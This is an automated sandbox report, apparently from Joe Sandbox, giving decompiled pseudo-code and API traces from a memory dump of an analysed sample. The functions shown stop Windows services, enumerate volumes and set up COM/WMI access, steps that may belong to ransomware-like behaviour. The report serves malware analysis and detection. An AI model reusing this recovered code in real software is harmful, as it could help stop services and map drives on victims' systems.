0x00000000
0x012fbd7b
0x012fbd22
0x012fbd7d
0x012fbd82
0x012fbd96
0x012fbda0
0x012fbda1
0x012fbdad
0x012fbdb4
0x012fbdbc
0x00000000
0x012fbdbe
0x012fbdc2
0x012fbdd5
0x012fbdc4
0x012fbdcb
0x00000000
0x00000000
0x012fbdcb
0x012fbdc2
0x00000000
0x012fbdcd
0x012fbdcd
0x012fbdd3
0x012fbd96
0x012fbd0f
0x012fbdd9
0x012fbdda
0x012fbdda
0x012fbde3
0x012fbde9
0x012fbcb2
0x012fbdfc

APIs

GetTickCount.KERNEL32 ref: 012FBC8F
OpenSCManagerW.ADVAPI32(00000000,00000000,000F003F), ref: 012FBCA7
OpenServiceW.ADVAPI32(00000000,?,0000002C,?), ref: 012FBCC5
QueryServiceStatusEx.ADVAPI32(00000000,00000000,?,00000024,?), ref: 012FBCFB
Sleep.KERNEL32(?,?), ref: 012FBD46
QueryServiceStatusEx.ADVAPI32(00000000,00000000,?,00000024,00000000,?,?), ref: 012FBD59
GetTickCount.KERNEL32 ref: 012FBD69
ControlService.ADVAPI32(00000000,00000001,?,?,00000000,00000000), ref: 012FBD8E
Sleep.KERNEL32(00000000), ref: 012FBDA1
QueryServiceStatusEx.ADVAPI32(00000000,00000000,?,00000024,00000000), ref: 012FBDB4
GetTickCount.KERNEL32 ref: 012FBDC4
CloseServiceHandle.ADVAPI32(00000000), ref: 012FBDDA
CloseServiceHandle.ADVAPI32(?), ref: 012FBDE3

Memory Dump Source

Source File: 00000002.00000002.310271306.00000000012F1000.00000020.00020000.sdmp, Offset: 012F0000, based on PE: true

Associated: 00000002.00000002.310248399.00000000012F0000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.310685959.0000000001374000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.310722867.0000000001396000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.310747166.00000000013A4000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.310762956.00000000013A8000.00000008.00020000.sdmp Download File
Associated: 00000002.00000002.310772796.00000000013AA000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.310784553.00000000013AC000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_12f0000_ab.jbxd

Similarity

API ID: Service$CountQueryStatusTick$CloseHandleOpenSleep$ControlManager
String ID:
API String ID: 165667597-0
Opcode ID: b5f5974295f33c100a4116b443b57ac13cdd7edc07c868c0cd605150605cccfe
Instruction ID: 8d7198c57bcb1c9993b62d4c092016e475c069850606b228e2862dee96f9c4e7
Opcode Fuzzy Hash: b5f5974295f33c100a4116b443b57ac13cdd7edc07c868c0cd605150605cccfe
Instruction Fuzzy Hash: FE415F30A1020DEBEB319AA8D848BEEFBBDEF49710F144129E741A61C4D774A584CB27

Uniqueness

Uniqueness Score: -1.00%

Function 0135D86B, Relevance: 19.6, APIs: 13, Instructions: 113
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 100%

			E0135D86B(intOrPtr _a4) {
				intOrPtr _v8;
				intOrPtr _t25;
				intOrPtr* _t26;
				intOrPtr _t28;
				intOrPtr* _t29;
				intOrPtr* _t31;
				intOrPtr* _t45;
				intOrPtr* _t46;
				intOrPtr* _t47;
				intOrPtr* _t55;
				intOrPtr* _t70;
				intOrPtr _t74;

				_t74 = _a4;
				_t25 =  *((intOrPtr*)(_t74 + 0x88));
				if(_t25 != 0 && _t25 != 0x13a4190) {
					_t45 =  *((intOrPtr*)(_t74 + 0x7c));
					if(_t45 != 0 &&  *_t45 == 0) {
						_t46 =  *((intOrPtr*)(_t74 + 0x84));
						if(_t46 != 0 &&  *_t46 == 0) {
							E01355C8F(_t46);
							E0135CB17( *((intOrPtr*)(_t74 + 0x88)));
						}
						_t47 =  *((intOrPtr*)(_t74 + 0x80));
						if(_t47 != 0 &&  *_t47 == 0) {
							E01355C8F(_t47);
							E0135CFCB( *((intOrPtr*)(_t74 + 0x88)));
						}
						E01355C8F( *((intOrPtr*)(_t74 + 0x7c)));
						E01355C8F( *((intOrPtr*)(_t74 + 0x88)));
					}
				}
				_t26 =  *((intOrPtr*)(_t74 + 0x8c));
				if(_t26 != 0 &&  *_t26 == 0) {
					E01355C8F( *((intOrPtr*)(_t74 + 0x90)) - 0xfe);
					E01355C8F( *((intOrPtr*)(_t74 + 0x94)) - 0x80);
					E01355C8F( *((intOrPtr*)(_t74 + 0x98)) - 0x80);
					E01355C8F( *((intOrPtr*)(_t74 + 0x8c)));
				}
				E0135D9DC( *((intOrPtr*)(_t74 + 0x9c)));
				_t28 = 6;
				_t55 = _t74 + 0xa0;
				_v8 = _t28;
				_t70 = _t74 + 0x28;
				do {
					if( *((intOrPtr*)(_t70 - 8)) != 0x13a42c8) {
						_t31 =  *_t70;
						if(_t31 != 0 &&  *_t31 == 0) {
							E01355C8F(_t31);
							E01355C8F( *_t55);
						}
						_t28 = _v8;
					}
					if( *((intOrPtr*)(_t70 - 0xc)) != 0) {
						_t22 = _t70 - 4; // 0xfffffe54
						_t29 =  *_t22;
						if(_t29 != 0 &&  *_t29 == 0) {
							E01355C8F(_t29);
						}
						_t28 = _v8;
					}
					_t55 = _t55 + 4;
					_t70 = _t70 + 0x10;
					_t28 = _t28 - 1;
					_v8 = _t28;
				} while (_t28 != 0);
				return E01355C8F(_t74);
			}

0x0135d873
0x0135d877
0x0135d87f
0x0135d888
0x0135d88d
0x0135d894
0x0135d89c
0x0135d8a4
0x0135d8af
0x0135d8b5
0x0135d8b6
0x0135d8be
0x0135d8c6
0x0135d8d1
0x0135d8d7
0x0135d8db
0x0135d8e6
0x0135d8ec
0x0135d88d
0x0135d8ed
0x0135d8f5
0x0135d908
0x0135d91b
0x0135d929
0x0135d934
0x0135d939
0x0135d942
0x0135d94a
0x0135d94b
0x0135d951
0x0135d954
0x0135d957
0x0135d95e
0x0135d960
0x0135d964
0x0135d96c
0x0135d973
0x0135d979
0x0135d97a
0x0135d97a
0x0135d981
0x0135d983
0x0135d983
0x0135d988
0x0135d990
0x0135d995
0x0135d996
0x0135d996
0x0135d999
0x0135d99c
0x0135d99f
0x0135d9a2
0x0135d9a2
0x0135d9b2

APIs

___free_lconv_mon.LIBCMT ref: 0135D8AF

Part of subcall function 0135CB17: _free.LIBCMT ref: 0135CB34
Part of subcall function 0135CB17: _free.LIBCMT ref: 0135CB46
Part of subcall function 0135CB17: _free.LIBCMT ref: 0135CB58
Part of subcall function 0135CB17: _free.LIBCMT ref: 0135CB6A
Part of subcall function 0135CB17: _free.LIBCMT ref: 0135CB7C
Part of subcall function 0135CB17: _free.LIBCMT ref: 0135CB8E
Part of subcall function 0135CB17: _free.LIBCMT ref: 0135CBA0
Part of subcall function 0135CB17: _free.LIBCMT ref: 0135CBB2
Part of subcall function 0135CB17: _free.LIBCMT ref: 0135CBC4
Part of subcall function 0135CB17: _free.LIBCMT ref: 0135CBD6
Part of subcall function 0135CB17: _free.LIBCMT ref: 0135CBE8
Part of subcall function 0135CB17: _free.LIBCMT ref: 0135CBFA
Part of subcall function 0135CB17: _free.LIBCMT ref: 0135CC0C

_free.LIBCMT ref: 0135D8A4

Part of subcall function 01355C8F: HeapFree.KERNEL32(00000000,00000000,?,013535B4), ref: 01355CA5
Part of subcall function 01355C8F: GetLastError.KERNEL32(?,?,013535B4), ref: 01355CB7

_free.LIBCMT ref: 0135D8C6
_free.LIBCMT ref: 0135D8DB
_free.LIBCMT ref: 0135D8E6
_free.LIBCMT ref: 0135D908
_free.LIBCMT ref: 0135D91B
_free.LIBCMT ref: 0135D929
_free.LIBCMT ref: 0135D934
_free.LIBCMT ref: 0135D96C
_free.LIBCMT ref: 0135D973
_free.LIBCMT ref: 0135D990
_free.LIBCMT ref: 0135D9A8

Memory Dump Source

Source File: 00000002.00000002.310271306.00000000012F1000.00000020.00020000.sdmp, Offset: 012F0000, based on PE: true

Associated: 00000002.00000002.310248399.00000000012F0000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.310685959.0000000001374000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.310722867.0000000001396000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.310747166.00000000013A4000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.310762956.00000000013A8000.00000008.00020000.sdmp Download File
Associated: 00000002.00000002.310772796.00000000013AA000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.310784553.00000000013AC000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_12f0000_ab.jbxd

Similarity

API ID: _free$ErrorFreeHeapLast___free_lconv_mon
String ID:
API String ID: 161543041-0
Opcode ID: 2a4734413f119c6b07b3e198a24142c8f9785a502c9e4647f38d62670839a95d
Instruction ID: 1603bc1257a6cbb029b3f79620ed54a5b8713db16dc8b801c22b6f649eae29eb
Opcode Fuzzy Hash: 2a4734413f119c6b07b3e198a24142c8f9785a502c9e4647f38d62670839a95d
Instruction Fuzzy Hash: 98314B716003029FEBA1AABCD844F6A7BE9EF00B58F144629E95AD7291DB70F840CB10

Uniqueness

Uniqueness Score: -1.00%

Function 012F59F0, Relevance: 17.8, APIs: 5, Strings: 5, Instructions: 252
COMMON

Download Yara Rule

C-Code - Quality: 36%

			E012F59F0(void* __ebx, void* __edi, intOrPtr* _a4) {
				char _v8;
				char _v16;
				signed int _v20;
				short _v532;
				short _v534;
				short _v536;
				short _v538;
				char _v540;
				short _v1060;
				char _v1064;
				char _v1068;
				char _v1072;
				void* _v1076;
				signed int _v1080;
				char _v1096;
				signed int _v1100;
				short _v1104;
				short _v1120;
				signed int _v1124;
				short _v1128;
				short _v1144;
				signed int _v1148;
				char _v1152;
				short _v1168;
				signed int _v1172;
				intOrPtr* _v1176;
				void* __esi;
				signed int _t124;
				signed int _t125;
				char* _t129;
				intOrPtr* _t132;
				signed int _t134;
				signed int _t136;
				signed int _t138;
				signed int _t140;
				long _t153;
				char* _t154;
				intOrPtr _t156;
				intOrPtr _t159;
				char* _t165;
				signed int _t168;
				intOrPtr _t169;
				void* _t180;
				short* _t188;
				intOrPtr* _t190;
				intOrPtr* _t194;
				signed int _t205;
				void* _t210;
				void* _t211;
				void* _t212;
				char* _t215;
				void* _t217;
				intOrPtr* _t218;
				void* _t219;
				void* _t220;
				short* _t221;
				void* _t223;
				signed int _t224;
				signed int _t226;
				void* _t228;

				_t180 = __ebx;
				_t224 = _t226;
				_t124 =  *0x13a4018; // 0x39cca9f6
				_t125 = _t124 ^ _t224;
				_v20 = _t125;
				 *[fs:0x0] =  &_v16;
				_t218 = _a4;
				asm("xorps xmm0, xmm0");
				_v1172 = _t218;
				asm("movq [ebp-0x42c], xmm0");
				_v1064 = 0;
				_v1176 = _t218;
				_v1072 = 0;
				_v1068 = 0;
				_v1064 = 0;
				_v8 = 0;
				E013478D0(__edi,  &_v540, 0, 0x208);
				_t228 = _t226 - 0x488 + 0xc;
				_t129 =  &_v540;
				__imp__FindFirstVolumeW(_t129, 0x104, _t125, __edi, _t217,  *[fs:0x0], 0x1365556, 0xffffffff, _t223);
				_t215 = _t129;
				if(_t215 == 0xffffffff) {
					L28:
					 *_t218 = _v1072;
					 *((intOrPtr*)(_t218 + 4)) = _v1068;
					 *((intOrPtr*)(_t218 + 8)) = _v1064;
					 *[fs:0x0] = _v16;
					_pop(_t219);
					return E0132EA79(_v20 ^ _t224, _t219);
				} else {
					do {
						_t132 =  &_v540;
						_t210 = _t132 + 2;
						do {
							_t188 =  *_t132;
							_t132 = _t132 + 2;
						} while (_t188 != 0);
						_t134 = _t132 - _t210 >> 1;
						if(_v540 != 0x5c || _v538 != 0x5c || _v536 != 0x3f || _v534 != 0x5c) {
							break;
						} else {
							_t220 = _t134 * 2 - 2;
							if( *((short*)(_t224 + _t220 - 0x218)) != 0x5c) {
								break;
							} else {
								if(_t220 >= 0x208) {
									E0132EC0C();
									asm("int3");
									asm("int3");
									asm("int3");
									asm("int3");
									asm("int3");
									asm("int3");
									asm("int3");
									asm("int3");
									asm("int3");
									asm("int3");
									asm("int3");
									asm("int3");
									_push(_t220);
									_t221 = _t188;
									_t136 =  *(_t221 + 0x44);
									if(_t136 >= 8) {
										_push(2 + _t136 * 2);
										E012F56A0(_t180, _t215,  *((intOrPtr*)(_t221 + 0x30)));
										_t228 = _t228 + 8;
									}
									 *((intOrPtr*)(_t221 + 0x40)) = 0;
									 *(_t221 + 0x44) = 7;
									 *((short*)(_t221 + 0x30)) = 0;
									_t138 =  *(_t221 + 0x2c);
									if(_t138 >= 8) {
										_push(2 + _t138 * 2);
										E012F56A0(_t180, _t215,  *((intOrPtr*)(_t221 + 0x18)));
										_t228 = _t228 + 8;
									}
									 *((intOrPtr*)(_t221 + 0x28)) = 0;
									 *(_t221 + 0x2c) = 7;
									 *((short*)(_t221 + 0x18)) = 0;
									_t140 =  *(_t221 + 0x14);
									if(_t140 >= 8) {
										_push(2 + _t140 * 2);
										E012F56A0(_t180, _t215,  *_t221);
									}
									 *((intOrPtr*)(_t221 + 0x10)) = 0;
									 *(_t221 + 0x14) = 7;
									 *_t221 = 0;
									return 0;
								} else {
									 *((short*)(_t224 + _t220 - 0x218)) = 0;
									E013478D0(_t215,  &_v1060, 0, 0x208);
									_t228 = _t228 + 0xc;
									_t153 = QueryDosDeviceW( &_v532,  &_v1060, 0x104);
									 *((short*)(_t224 + _t220 - 0x218)) = 0x5c;
									if(_t153 != 0) {
										_v1152 = 0;
										_v1148 = 7;
										_v1168 = 0;
										_v1128 = 0;
										_v1124 = 7;
										_v1144 = 0;
										_v1104 = 0;
										_v1100 = 7;
										_v1120 = 0;
										_t190 =  &_v1060;
										_v8 = 1;
										_t211 = _t190 + 2;
										do {
											_t156 =  *_t190;
											_t190 = _t190 + 2;
										} while (_t156 != 0);
										_push(_t190 - _t211 >> 1);
										E012F51B0(_t180,  &_v1168, _t215, _t220,  &_v1060);
										_t194 =  &_v540;
										_t45 = _t194 + 2; // 0x5e
										_t212 = _t45;
										do {
											_t159 =  *_t194;
											_t194 = _t194 + 2;
										} while (_t159 != 0);
										E012F51B0(_t180,  &_v1144, _t215, _t220,  &_v540);
										_v1172 = 0x104;
										E012F4F70(_t180,  &_v1096, _t215, _t220, 0x104, 0);
										_v8 = 2;
										_t164 =  >=  ? _v1096 :  &_v1096;
										_t165 =  &_v540;
										__imp__GetVolumePathNamesForVolumeNameW(_t165,  >=  ? _v1096 :  &_v1096, _v1172,  &_v1172, _t194 - _t212 >> 1);
										if(_t165 == 0) {
											_v1080 = 0;
											_t167 =  >=  ? _v1096 :  &_v1096;
											 *((short*)( >=  ? _v1096 :  &_v1096)) = 0;
										} else {
											_t205 = _v1172;
											_t174 = _v1080;
											if(_t205 > _v1080) {
												E012F6190(_t180,  &_v1096, _t215, _t205 - _t174, 0);
												E012F4B40( &_v1096);
											} else {
												_v1080 = _t205;
												_t178 =  >=  ? _v1096 :  &_v1096;
												 *((short*)(( >=  ? _v1096 :  &_v1096) + _t205 * 2)) = 0;
												E012F4B40( &_v1096);
											}
										}
										_v8 = 1;
										_t168 = _v1100;
										if(_t168 >= 8) {
											_push(2 + _t168 * 2);
											E012F56A0(_t180, _t215, _v1120);
											_t228 = _t228 + 8;
										}
										asm("movups xmm1, [ebp-0x444]");
										_t169 = _v1068;
										asm("movq xmm2, [ebp-0x434]");
										asm("movups [ebp-0x45c], xmm1");
										asm("movq [ebp-0x44c], xmm2");
										if(_t169 == _v1064) {
											E012F6440(_t180,  &_v1072, _t169,  &_v1168);
										} else {
											asm("movups xmm0, [ebp-0x48c]");
											 *((intOrPtr*)(_t169 + 0x10)) = 0;
											_v1168 = 0;
											asm("movups [eax], xmm0");
											_v1104 = 0;
											asm("movq xmm0, [ebp-0x47c]");
											asm("movq [eax+0x10], xmm0");
											asm("movups xmm0, [ebp-0x474]");
											_v1152 = 0;
											_v1148 = 7;
											asm("movups [eax+0x18], xmm0");
											_v1144 = 0;
											asm("movq xmm0, [ebp-0x464]");
											asm("movq [eax+0x28], xmm0");
											asm("movups [eax+0x30], xmm1");
											_v1128 = 0;
											asm("movq [eax+0x40], xmm2");
											_v1068 = _v1068 + 0x48;
											_v1124 = 7;
											_v1100 = 7;
											_v1120 = 0;
										}
										_v8 = 0;
										L30();
									}
									goto L26;
								}
							}
						}
						goto L37;
						L26:
						_t154 =  &_v540;
						__imp__FindNextVolumeW(_t215, _t154, 0x104);
					} while (_t154 != 0);
					__imp__FindVolumeClose(_t215);
					_t218 = _v1176;
					goto L28;
				}
				L37:
			}

0x012f59f0
0x012f59f1
0x012f5a07
0x012f5a0c
0x012f5a0e
0x012f5a17
0x012f5a1d
0x012f5a20
0x012f5a23
0x012f5a29
0x012f5a31
0x012f5a3b
0x012f5a41
0x012f5a4b
0x012f5a55
0x012f5a6a
0x012f5a74
0x012f5a79
0x012f5a7c
0x012f5a88
0x012f5a8e
0x012f5a93
0x012f5e16
0x012f5e1e
0x012f5e26
0x012f5e2f
0x012f5e35
0x012f5e3e
0x012f5e4c
0x012f5aa0
0x012f5aa0
0x012f5aa0
0x012f5aa6
0x012f5ab0
0x012f5ab0
0x012f5ab3
0x012f5ab6
0x012f5abd
0x012f5ac7
0x00000000
0x012f5af7
0x012f5af7
0x012f5b07
0x00000000
0x012f5b0d
0x012f5b13
0x012f5e4f
0x012f5e54
0x012f5e55
0x012f5e56
0x012f5e57
0x012f5e58
0x012f5e59
0x012f5e5a
0x012f5e5b
0x012f5e5c
0x012f5e5d
0x012f5e5e
0x012f5e5f
0x012f5e60
0x012f5e61
0x012f5e63
0x012f5e69
0x012f5e72
0x012f5e76
0x012f5e7b
0x012f5e7b
0x012f5e80
0x012f5e87
0x012f5e8e
0x012f5e92
0x012f5e98
0x012f5ea1
0x012f5ea5
0x012f5eaa
0x012f5eaa
0x012f5eaf
0x012f5eb6
0x012f5ebd
0x012f5ec1
0x012f5ec7
0x012f5ed0
0x012f5ed3
0x012f5ed8
0x012f5edd
0x012f5ee4
0x012f5eeb
0x012f5eef
0x012f5b19
0x012f5b21
0x012f5b30
0x012f5b35
0x012f5b4b
0x012f5b56
0x012f5b60
0x012f5b68
0x012f5b72
0x012f5b7c
0x012f5b83
0x012f5b89
0x012f5b93
0x012f5b9a
0x012f5ba0
0x012f5baa
0x012f5bb1
0x012f5bb7
0x012f5bbb
0x012f5bc0
0x012f5bc0
0x012f5bc3
0x012f5bc6
0x012f5bd5
0x012f5bdd
0x012f5be2
0x012f5be8
0x012f5be8
0x012f5bf0
0x012f5bf0
0x012f5bf3
0x012f5bf6
0x012f5c0d
0x012f5c1f
0x012f5c29
0x012f5c2e
0x012f5c4c
0x012f5c54
0x012f5c5b
0x012f5c63
0x012f5ccc
0x012f5cd6
0x012f5cdf
0x012f5c65
0x012f5c65
0x012f5c6b
0x012f5c73
0x012f5cad
0x012f5cb8
0x012f5c75
0x012f5c82
0x012f5c88
0x012f5c91
0x012f5c9b
0x012f5c9b
0x012f5c73
0x012f5ce2
0x012f5ce6
0x012f5cef
0x012f5cf8
0x012f5cff
0x012f5d04
0x012f5d04
0x012f5d07
0x012f5d0e
0x012f5d14
0x012f5d1c
0x012f5d23
0x012f5d31
0x012f5dda
0x012f5d37
0x012f5d37
0x012f5d3e
0x012f5d47
0x012f5d4e
0x012f5d51
0x012f5d57
0x012f5d5f
0x012f5d64
0x012f5d6b
0x012f5d75
0x012f5d7f
0x012f5d83
0x012f5d8a
0x012f5d92
0x012f5d97
0x012f5d9b
0x012f5da1
0x012f5da8
0x012f5daf
0x012f5db9
0x012f5dc3
0x012f5dc3
0x012f5de5
0x012f5de9
0x012f5de9
0x00000000
0x012f5b60
0x012f5b13
0x012f5b07
0x00000000
0x012f5dee
0x012f5df3
0x012f5dfb
0x012f5e01
0x012f5e0a
0x012f5e10
0x00000000
0x012f5e10
0x00000000

APIs

FindFirstVolumeW.KERNEL32(?,00000104,39CCA9F6), ref: 012F5A88
QueryDosDeviceW.KERNEL32(?,?,00000104), ref: 012F5B4B
GetVolumePathNamesForVolumeNameW.KERNEL32(0000005C,?,00000104,00000104,00000104,00000000,0000005C,0000005A,?,?), ref: 012F5C5B
FindNextVolumeW.KERNEL32(00000000,0000005C,00000104), ref: 012F5DFB
FindVolumeClose.KERNEL32(00000000), ref: 012F5E0A

Strings

\, xrefs: 012F5ACD
H, xrefs: 012F5DA8
\, xrefs: 012F5AFE
?, xrefs: 012F5ADB
\, xrefs: 012F5AE9

Memory Dump Source

Source File: 00000002.00000002.310271306.00000000012F1000.00000020.00020000.sdmp, Offset: 012F0000, based on PE: true

Associated: 00000002.00000002.310248399.00000000012F0000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.310685959.0000000001374000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.310722867.0000000001396000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.310747166.00000000013A4000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.310762956.00000000013A8000.00000008.00020000.sdmp Download File
Associated: 00000002.00000002.310772796.00000000013AA000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.310784553.00000000013AC000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_12f0000_ab.jbxd

Similarity

API ID: Volume$Find$CloseDeviceFirstNameNamesNextPathQuery
String ID: ?$H$\$\$\
API String ID: 1315226759-2772711985
Opcode ID: b3385077e77aa403fd61e97550a3a433c7845a2981806470794ae1e973da7c55
Instruction ID: a116ea67384d82f7f255bfa194e906c6e605bc305b6a5720dadbfb9a64e3845a
Opcode Fuzzy Hash: b3385077e77aa403fd61e97550a3a433c7845a2981806470794ae1e973da7c55
Instruction Fuzzy Hash: E6B11BB0D102298ADB20DF24DD95BEDB7B8AF58304F4046EDD60DA7251EB706B88CF59

Uniqueness

Uniqueness Score: -1.00%

Function 012FB290, Relevance: 16.9, APIs: 11, Instructions: 388
memorycomCOMMON

Download Yara Rule

C-Code - Quality: 43%

			E012FB290(void* __ebx, signed int __edi, char _a4) {
				char _v8;
				char _v16;
				signed int _v20;
				void* _v24;
				void* _v28;
				void* _v32;
				void* _v36;
				void* _v40;
				void* _v44;
				intOrPtr _v52;
				char _v60;
				void* _v64;
				intOrPtr _v68;
				void* _v72;
				void* _v76;
				intOrPtr _v80;
				signed int _v88;
				intOrPtr _v92;
				short _v108;
				signed int _v112;
				intOrPtr _v116;
				short _v132;
				signed int _v136;
				intOrPtr _v140;
				short _v156;
				void* __esi;
				void* __ebp;
				signed int _t123;
				signed int _t124;
				char* _t127;
				intOrPtr* _t131;
				intOrPtr* _t132;
				intOrPtr* _t133;
				short _t134;
				char _t135;
				signed int _t136;
				intOrPtr* _t137;
				intOrPtr* _t139;
				intOrPtr* _t141;
				intOrPtr* _t143;
				intOrPtr _t144;
				signed int _t145;
				intOrPtr* _t147;
				intOrPtr* _t149;
				intOrPtr _t150;
				signed int _t151;
				intOrPtr* _t160;
				intOrPtr* _t162;
				intOrPtr _t163;
				intOrPtr* _t166;
				signed int _t168;
				intOrPtr* _t170;
				intOrPtr* _t175;
				intOrPtr* _t177;
				intOrPtr* _t179;
				intOrPtr* _t181;
				intOrPtr _t185;
				intOrPtr _t186;
				intOrPtr _t192;
				intOrPtr _t199;
				intOrPtr _t205;
				intOrPtr* _t212;
				intOrPtr* _t226;
				intOrPtr* _t227;
				intOrPtr* _t228;
				signed int _t251;
				signed int _t253;
				intOrPtr _t254;
				void* _t255;
				void* _t256;
				intOrPtr* _t257;
				intOrPtr* _t258;
				intOrPtr* _t259;
				intOrPtr* _t260;
				intOrPtr* _t261;
				intOrPtr* _t262;
				intOrPtr _t263;
				signed int _t264;
				void* _t265;
				void* _t266;

				_t251 = __edi;
				_t266 = _t265 - 0x8c;
				_t123 =  *0x13a4018; // 0x39cca9f6
				_t124 = _t123 ^ _t264;
				_v20 = _t124;
				 *[fs:0x0] =  &_v16;
				_v72 = _a4;
				_t127 =  &_v32;
				_v32 = 0;
				__imp__CoCreateInstance(0x1378f1c, 0, 1, 0x1378f2c, _t127, _t124, __edi, _t255, __ebx,  *[fs:0x0], 0x1365bd0, 0xffffffff);
				_t268 = _t127;
				if(_t127 >= 0) {
					_v28 = 0;
					_t257 =  *((intOrPtr*)( *_v32 + 0xc));
					_t131 = E012F93F0( &_v108, 0x13a4c74, __edi, _t268);
					_v8 = 0;
					_t269 =  *((intOrPtr*)(_t131 + 0x14)) - 8;
					if( *((intOrPtr*)(_t131 + 0x14)) >= 8) {
						_t131 =  *_t131;
					}
					_t132 = E012F9580( &_v64, _t269, _t131);
					_v8 = 1;
					_t133 =  *_t132;
					if(_t133 == 0) {
						_t134 = 0;
						__eflags = 0;
					} else {
						_t134 =  *_t133;
					}
					_t135 =  *_t257(_v32, _t134, 0, 0, 0, 0, 0, 0,  &_v28);
					_t258 = _v64;
					_t253 = _t251 | 0xffffffff;
					_t212 = __imp__#6;
					_v36 = _t135;
					if(_t258 != 0) {
						asm("lock xadd [esi+0x8], ecx");
						if(_t253 == 1 && _t258 != 0) {
							_t205 =  *_t258;
							if(_t205 != 0) {
								 *_t212(_t205);
								 *_t258 = 0;
							}
							_t206 =  *((intOrPtr*)(_t258 + 4));
							if( *((intOrPtr*)(_t258 + 4)) != 0) {
								L0132ECE6(_t206);
								_t266 = _t266 + 4;
								 *((intOrPtr*)(_t258 + 4)) = 0;
							}
							_push(0xc);
							E0132EABA(_t258);
							_t266 = _t266 + 8;
						}
						_v64 = 0;
					}
					_v8 = 0xffffffff;
					_t136 = _v88;
					if(_t136 >= 8) {
						_push(2 + _t136 * 2);
						_t136 = E012F56A0(_t212, _t253, _v108);
						_t266 = _t266 + 8;
					}
					if(_v36 >= 0) {
						__imp__CoSetProxyBlanket(_v28, 0xa, 0, 0, 3, 3, 0, 0);
						_t278 = _t136;
						if(_t136 >= 0) {
							_t141 = E012F93F0( &_v132, 0x13a510c, _t253, _t278);
							_v8 = 2;
							_t279 =  *((intOrPtr*)(_t141 + 0x14)) - 8;
							if( *((intOrPtr*)(_t141 + 0x14)) >= 8) {
								_t141 =  *_t141;
							}
							_t143 =  *((intOrPtr*)(E012F9580( &_v64, _t279, _t141)));
							if(_t143 == 0) {
								_t144 = 0;
								__eflags = 0;
							} else {
								_t144 =  *_t143;
							}
							__imp__#2(_t144);
							_t259 = _v64;
							_v80 = _t144;
							if(_t259 != 0) {
								asm("lock xadd [esi+0x8], ecx");
								if(_t253 == 1 && _t259 != 0) {
									_t199 =  *_t259;
									if(_t199 != 0) {
										 *_t212(_t199);
										 *_t259 = 0;
									}
									_t200 =  *((intOrPtr*)(_t259 + 4));
									if( *((intOrPtr*)(_t259 + 4)) != 0) {
										L0132ECE6(_t200);
										_t266 = _t266 + 4;
										 *((intOrPtr*)(_t259 + 4)) = 0;
									}
									_push(0xc);
									E0132EABA(_t259);
									_t266 = _t266 + 8;
								}
								_v64 = 0;
							}
							_v8 = 0xffffffff;
							_t145 = _v112;
							_t286 = _t145 - 8;
							if(_t145 >= 8) {
								_push(2 + _t145 * 2);
								E012F56A0(_t212, _t253, _v132);
								_t266 = _t266 + 8;
							}
							_v116 = 0;
							_v112 = 7;
							_v132 = 0;
							_t147 = E012F93F0( &_v108, 0x13a501c, _t253, _t286);
							_v8 = 3;
							_t287 =  *((intOrPtr*)(_t147 + 0x14)) - 8;
							if( *((intOrPtr*)(_t147 + 0x14)) >= 8) {
								_t147 =  *_t147;
							}
							_t149 =  *((intOrPtr*)(E012F9580( &_v76, _t287, _t147)));
							if(_t149 == 0) {
								_t150 = 0;
								__eflags = 0;
							} else {
								_t150 =  *_t149;
							}
							__imp__#2(_t150);
							_t260 = _v76;
							_v68 = _t150;
							if(_t260 != 0) {
								asm("lock xadd [esi+0x8], ecx");
								if(_t253 == 1 && _t260 != 0) {
									_t192 =  *_t260;
									if(_t192 != 0) {
										 *_t212(_t192);
										 *_t260 = 0;
									}
									_t193 =  *((intOrPtr*)(_t260 + 4));
									if( *((intOrPtr*)(_t260 + 4)) != 0) {
										L0132ECE6(_t193);
										_t266 = _t266 + 4;
										 *((intOrPtr*)(_t260 + 4)) = 0;
									}
									_push(0xc);
									E0132EABA(_t260);
									_t266 = _t266 + 8;
								}
								_v76 = 0;
							}
							_v8 = 0xffffffff;
							_t151 = _v88;
							if(_t151 >= 8) {
								_push(2 + _t151 * 2);
								E012F56A0(_t212, _t253, _v108);
								_t266 = _t266 + 8;
							}
							_t226 = _v28;
							_v92 = 0;
							_v108 = 0;
							_v40 = 0;
							_v88 = 7;
							 *((intOrPtr*)( *_t226 + 0x18))(_t226, _v68, 0, 0,  &_v40, 0);
							_t227 = _v40;
							_v44 = 0;
							 *((intOrPtr*)( *_t227 + 0x4c))(_t227, _v80, 0,  &_v44, 0);
							_t228 = _v44;
							_v24 = 0;
							 *((intOrPtr*)( *_t228 + 0x3c))(_t228, 0,  &_v24);
							_v60 = 8;
							_t160 = _v72;
							_t295 =  *((intOrPtr*)(_t160 + 0x14)) - 8;
							if( *((intOrPtr*)(_t160 + 0x14)) >= 8) {
								_t160 =  *_t160;
							}
							_t162 =  *((intOrPtr*)(E012F9580( &_v72, _t295, _t160)));
							if(_t162 == 0) {
								_t163 = 0;
								__eflags = 0;
							} else {
								_t163 =  *_t162;
							}
							_t261 = _v72;
							_v52 = _t163;
							if(_t261 != 0) {
								asm("lock xadd [esi+0x8], edi");
								if(_t253 == 0 && _t261 != 0) {
									_t185 =  *_t261;
									if(_t185 != 0) {
										 *_t212(_t185);
										 *_t261 = 0;
									}
									_t186 =  *((intOrPtr*)(_t261 + 4));
									_t301 = _t186;
									if(_t186 != 0) {
										L0132ECE6(_t186);
										_t266 = _t266 + 4;
										 *((intOrPtr*)(_t261 + 4)) = 0;
									}
									_push(0xc);
